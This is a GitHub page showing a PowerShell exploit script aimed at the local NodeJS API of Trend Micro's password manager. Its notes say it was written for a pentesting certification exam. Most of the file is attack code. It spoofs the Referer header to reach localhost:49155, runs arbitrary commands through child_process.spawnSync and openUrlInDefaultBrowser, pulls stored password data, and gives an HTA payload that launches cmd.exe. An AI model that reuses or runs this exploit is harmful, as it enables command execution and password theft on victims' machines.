-
Notifications
You must be signed in to change notification settings - Fork 28
Expand file tree
/
Copy pathExploit-TrendMicroPWM-LocalNodeJSAPI.ps1
More file actions
124 lines (104 loc) · 4.34 KB
/
Copy pathExploit-TrendMicroPWM-LocalNodeJSAPI.ps1
File metadata and controls
124 lines (104 loc) · 4.34 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
function Exploit-TrendMicroPWM-LocalNodeJSAPI
{
<#
.SYNOPSYS
A local privlidge esc exploit of the old TrendMicro Local NodeJS Api as described here: https://code.google.com/p/google-security-research/issues/detail?id=693
By setting header values we attempt to bypass their patch and exploit the orginal vulnerablity locally.
Still being developed, bypass dosn't fully work yet.
.DESCRIPTION
This cmdlet exploits a patched vulnerability in an early version of Trend Micro Maximum Security 10 Password Vault that listens and accepts arbitrary commands on a local NodeJS web server API. Originally uncovered by Google Security Research's Tavis Ormandy, this exploit can be used for privlidge escelation or blind remote code execution if loaded as a CSRF link on a malicious website
By setting header values we attempt to bypass their patch and exploit the orginal vulnerablity locally.
Still being developed, bypass dosn't fully work yet.
.PARAMETER ExecshowSB
Specifies the process for which a dump will be generated. The process object is obtained with Get-Process.
.PARAMETER ExecopenUrl
This exploit method abuses the openUrlInDefaultBrowser api method
.PARAMETER cmd
The param specifices the cmd to execute. You can also load hta files to run scripts, see the example file
.PARAMETER DumpPasswords
A switch that calls an API function that dumps all of the passwords stored in the password manager.
.EXAMPLE
If you want to run a script create a HTA file like below, upload it, and call it with the openUrl function
Example HTA file provided by Tavis:
<html>
<head>
<title>TrendMicro Exploit</title>
<HTA:APPLICATION APPLICATIONNAME="TrendMicro Exploit"/>
<script language="vbscript">
Set o = CreateObject("Shell.Application")
o.ShellExecute "cmd.exe", "/k echo hello world", "", "", 1
</script>
</head>
<body>
This is a demonstrate exploit for TrendMicro Maximum Security.
</body>
</html>
.Example
PS C:\> Import-Module Exploit-TrendMicro-2016.ps1
Exploit-TrendMicro-2016 -Exec-openUrl -cmd c:/windows/system32/calc.exe
Exploit-TrendMicro-2016 -Exec-showSB -cmd c:/windows/system32/calc.exe
Exploit-TrendMicro-2016 -DumpPasswords
.LINK
https://github.com/ahhh/PSSE/blob/master/Exploit-TrendMicroPasswordVault-LocalNodeJSAPI.ps1
https://www.exploit-db.com/exploits/39218/
https://code.google.com/p/google-security-research/issues/detail?id=693
https://code.google.com/p/google-security-research/issues/attachmentText?id=693&aid=6930013000&name=exploit.html&token=ABZ6GAeC8k-C4DoKYTNWcUnIeEMNnaWUWw%3A1453791117238
.NOTES
Ment to exploit the current version at publication of: https://pwm.trendmicro.com/
This script has been created for completing the requirements of the SecurityTube PowerShell for Penetration Testers Certification Exam
http://www.securitytube-training.com/online-courses/powershell-for-pentesters/
Student ID: PSP-3061d
#>
[CmdletBinding()]
Param (
[Parameter(Mandatory=$false)]
[String]
$cmd = "c:/windows/system32/calc.exe",
[Parameter(Mandatory=$false)]
[Switch]
$ExecshowSB = $False,
[Parameter(Mandatory=$false)]
[Switch]
$ExecopenUrl = $Fales,
[Parameter(Mandatory=$false)]
[Switch]
$DumpPasswords = $False
)
function openUrlInDefaultBrowser($cmd){
$webClient = New-Object Net.WebClient
$webClient.Headers.Add("Referer","pwm.trendmicro.com")
$url = "https://localhost:49155/api/openUrlInDefaultBrowser?url=$cmd"
Try{
$webClient.DownloadString($url)
}Catch{Write-Error $Error[0]}
}
function showSB($cmd){
$webClient = New-Object Net.WebClient
$webClient.Headers.Add("Referer","pwm.trendmicro.com")
$url = 'https://localhost:49155/api/showSB?url=javascript:alert(topWindow.require("child_process").spawnSync("$cmd"))'
Try{
$webClient.DownloadString($url)
}Catch{Write-Error $Error[0]}
}
function GetUserPasswords{
$webClient = New-Object Net.WebClient
$webClient.Headers.Add("Referer","pwm.trendmicro.com")
$url = "https://localhost:49155/api/showSB?url=javascript:topWindow.process.mainModule.exports.Tower.handle.getUserData(function(n){alert(JSON.parse(n).data.passcard[0].Domain)})"
Try{
$webClient.DownloadString($url)
}Catch{Write-Error $Error[0]}
}
if ($ExecshowSB -eq $True)
{
showSB $cmd
} elseif ($ExecopenUrl -eq $True)
{
openUrlInDefaultBrowser $cmd
} elseif ($DumpPasswords -eq $True)
{
GetUserPasswords
}
else{
openUrlInDefaultBrowser $cmd
}
}